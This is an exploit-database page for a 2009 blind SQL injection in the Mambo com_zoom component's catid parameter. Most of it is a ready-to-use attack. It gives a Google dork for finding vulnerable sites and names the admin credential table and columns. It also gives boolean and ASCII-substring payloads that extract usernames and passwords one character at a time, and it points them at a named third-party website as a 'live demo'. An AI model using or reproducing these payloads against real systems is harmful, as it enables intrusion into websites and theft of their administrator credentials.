Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
N/A | High | Remote | 2009-09-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
Mambo component com_zoom (catid) Blind SQL injection Red n'black i dress eagle on my chest. It's good to be an ALBANIAN Keep my head up high for that flag i die. Im proud to be an ALBANIAN ###### Author : boom3rang Contact : boom3rang[at]live.com Greetz : H!tm@N - KHG - cHs R.I.P redc00de ------------------------------------------------------------------- Affected software description <name>zoom</name> <creationDate>20/01/2004</creationDate> <author>Mike de Boer</author> <authorEmail>[email protected]</authorEmail> <authorUrl>www.mikedeboer.nl</authorUrl> <version>2.0</version> ------------------------------------------------------------------- [~] SQLi : http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi] [~]Google Dork : inurl:com_zoom inurl:"imgid" ------------------------------------------------------------------- [~] Table_NAME = mos_users [~] Column_NAME = username - password ------------------------------------------------------------------- [~] Admin Path : http://www.TARGET.com/administrator === = POC = === [~] Live Demo: ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False ------------------------------------------------------------------- [~] ASCII index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96 ------------------------------------------------------------------- [~] Live Demo ASCII True http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96 False http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97 Like we see, the first charter of username is 'a'char(97)=a Now you can change the second limit to find other charters, Good Luck... note: <name>zoom</name> <creationDate>20/01/2004</creationDate> <author>Mike de Boer</author> <authorEmail>[email protected]</authorEmail> <authorUrl>www.mikedeboer.nl</authorUrl> <version>2.0</version>
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.